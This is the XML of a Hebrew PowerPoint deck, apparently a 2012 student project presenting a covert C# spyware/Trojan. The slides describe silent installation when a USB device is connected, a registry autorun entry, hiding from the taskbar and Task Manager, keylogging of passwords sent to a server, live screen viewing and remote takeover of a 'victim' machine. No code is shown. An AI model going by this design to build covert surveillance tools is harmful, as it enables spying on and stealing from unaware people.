            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>אתרים ללימוד </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="3760436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מטרת העבודה</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a:xfrm>
            <a:off x="500034" y="1357298"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>   מטרת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>הפרויקט היא ליצור תוכנת שרת-לקוח למען אפשרות של תקשור מרחוק בין מחשבים. בנוסף לכך, ליצור תוכנה שפעולותיה סמויות וליישם </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>בתוכנה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>את כל תכונות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>הריגול כגון: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>צפייה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>במעשיו של המשתמש, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>השתלטות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>על מחשב המשתמש ושמירת כל הקלטים שהוכנסו </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>מהמקלדת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" err="1" smtClean="0"/>
              <a:t>וכו'.</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1883518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סביבת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>העבודה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>ושפת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>התכנות </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a:xfrm>
            <a:off x="500034" y="1500174"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>סביבת העבודה בה אני מתכנת היא 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft Visual C# Express</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>בחרתי בסביבה זו כי היא נוחה לעבודה הן מבחינת התכנות והן מבחינת העבודה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>כיוון שהאפשרות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>לשימוש ועיצוב </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>מובנת בסביבה ולא </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>בדרכי קוד.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>שפת התכנות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>אשר מתאימה לעבודה בסביבה זו היא </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>שפה זו דומה ל- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JAVA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> שהיא השפה שלמדתי בבית הספר. גם </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JAVA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> ו- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t># הן שפות תכנות מונחה עצמים. לצורך כתיבת הפרויקט למדתי בעצמי את השפה החדשה. </a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1409588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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>שאלות שהמערכת עונה עליהן</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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" u="sng" dirty="0" smtClean="0"/>
              <a:t>תקשור </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" u="sng" dirty="0"/>
              <a:t>בין המחשב הראשי למחשב המשני:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> המחשב של האדם שאחראי על כל הריגול </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>הוא </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>המחשב הראשי. תת-תוכנה שתפעל במחשב זה תהיה השרת (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>) והוא יאזין בכל רגע נתון למידע מן המחשב של הקורבן, שעליהם הותקנה התוכנה 'התמימה'. לקורבן תהיה מותקנת תת-התוכנה לקוח (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>). התקשורת בין המחשבים תתבסס על ה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network -  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>דרך האינטרנט בחיבור </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TCP/ IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> ושליחת המידע באמצעות "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" err="1"/>
              <a:t>פאקטות</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>"-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Packets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="380057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שאלות שהמערכת עונה עליהן</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70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" u="sng" dirty="0"/>
              <a:t>הסוואת תוכנת הריגול:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> כשתוכנת הריגול תותקן על אחד מהמחשבים, היא לא תותקן בהצהרה כסוס טרויאני או תוכנת ריגול </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>אלא תותקן אוטומאטית ללא ידיעת הקורבן.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>התוכנה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>(תוכנת הריגול) בעצם תתקין את </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>עצמה ברגע שהתקן חיצוני יחובר למחשב של הקורבן. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>בנוסף לכך היא תדאג לכך שהיא תיצור ערך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" err="1"/>
              <a:t>ברג'יסטרי</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> ובעצם תנחה את המחשב לפתוח אותה בצורה אוטומטית. </a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>בכך</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>, הקורבן לא יאולץ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>להכניס התקן חיצוני בכל </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>פעם מחדש. יחד עם ההסתרה שלה בעת ההתקנה, גם בזמן האמת התוכנה תהיה מוסתרת מהקורבן. היא לא תוצג בשורת המשימות, ולא דרך מנהל המשימות של </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>  בתצוגת התוכנות הפועלות. מיותר לציין שהתוכנה לא תראה לעין גם כחלון פתוח</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="2887615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שאלות שהמערכת עונה עליהן</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85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" u="sng" dirty="0"/>
              <a:t>פעולת הריגול של שמירת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" u="sng" dirty="0" err="1"/>
              <a:t>הקלטים</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" u="sng" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> תכונה זו ידועה גם כ-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key logger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> ותפקידה יהיה לשמור כל קלט שהוכנס על ידי המשתמש מהמקלדת ולשמור אותו. לאחר כמות זמן מסוימת רשימת הקלטים ישלחו למחשב הראשי, השרת, ובפעולה זו נוח לעקוב אחר המשפטים שרשם הקורבן למשל בדואר האלקטרוני, או אחר סיסמאות</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" u="sng" dirty="0"/>
              <a:t>פעולת הריגול של צפייה במסך:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> המערכת תטפל בנושא העברת המידע של תמונת מסך רציפה אל השרת ובאופן יעיל ככל האפשר כך שיהיה אפשר לעקוב אחר מעשיו של המשתמש באמצעות צפייה. </a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1553071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שאלות שהמערכת עונה עליהן</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lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" u="sng" dirty="0"/>
              <a:t>פעולת ההשתלטות על המחשב:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> פעולה זו פחות נפוצה בקרב תוכנות הריגול ספציפית ויותר נראית בתוכנות סוס-טרויאני של דלת אחורית כפי שהוסבר במבוא. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>זאת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>משום שבעת השתלטות על המחשב קל וברור לקורבן לראות שהעכבר שלו זז מבלי שהוא גורם לכך, אלא אם כן הוא לא על יד המחשב. למרות הכול, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>ראיתי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>לנכון לצרף את הפעולה הזו כי היא מעניינת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>אותי </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>ואופיינית לתחום הסוסים הטרויאניים.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1750633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dirty="0" smtClean="0">
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>מודולים-שרת</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" b="1" dirty="0">
              <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="מציין מיקום תוכן 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ruler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>- יורשת מהמחלקה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> מחלקה זו בעצם מפעילה את כל הפונקציות של השליטה והריגול, יש בה פעולות לכל כפתור שנלחץ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>– זוהי המחלקה ששולחת הודעות ללקוח, מקבל הודעות ומורידה תמונות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>לשרת</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>- מחלקה עם פעולה אחת שמורידה קובץ שהשרת העלה, המחלקה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> משתמש בפעולה זו כדי להוריד את התמונה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FullWatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t>– מחלקה אשר מקבלת קריאה מהמחלקה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ruler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" dirty="0"/>
              <a:t> ומציגה את מסך הקורבן על גבי מסך מלא</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="421683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979</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>‫הצגה על המסך (4:3)</PresentationFormat>
  <Paragraphs>188</Paragraphs>
  <Slides>21</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21</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="22" baseType="lpstr">
      <vt:lpstr>ערכת נושא Office</vt:lpstr>
      <vt:lpstr>שקופית 1</vt:lpstr>
      <vt:lpstr>תיאור נושא העבודה</vt:lpstr>
      <vt:lpstr>מטרת העבודה</vt:lpstr>
      <vt:lpstr>סביבת העבודה ושפת התכנות </vt:lpstr>
      <vt:lpstr>שאלות שהמערכת עונה עליהן</vt:lpstr>
      <vt:lpstr>שאלות שהמערכת עונה עליהן</vt:lpstr>
      <vt:lpstr>שאלות שהמערכת עונה עליהן</vt:lpstr>
      <vt:lpstr>שאלות שהמערכת עונה עליהן</vt:lpstr>
      <vt:lpstr>מודולים-שרת</vt:lpstr>
      <vt:lpstr>מודולים-לקוח</vt:lpstr>
      <vt:lpstr>אלגוריתמים מרכזיים</vt:lpstr>
      <vt:lpstr>אלגוריתמים מרכזיים</vt:lpstr>
      <vt:lpstr>אלגוריתמים מרכזיים</vt:lpstr>
      <vt:lpstr>אלגוריתמים מרכזיים</vt:lpstr>
      <vt:lpstr>אלגוריתמים מרכזיים</vt:lpstr>
      <vt:lpstr>אלגוריתמים מרכזיים</vt:lpstr>
      <vt:lpstr>אלגוריתמים מרכזיים</vt:lpstr>
      <vt:lpstr>אלגוריתמים מרכזיים</vt:lpstr>
      <vt:lpstr>לימוד עצמי</vt:lpstr>
      <vt:lpstr>אתגרים במהלך הפרויקט</vt:lpstr>
      <vt:lpstr>ביבליוגרפיה</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בוריק</dc:creator>
  <cp:lastModifiedBy>Sharona</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-03-25T23:43:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-04-17T20:06:22Z</dcterms:modified>
</cp:coreProperties>
</file>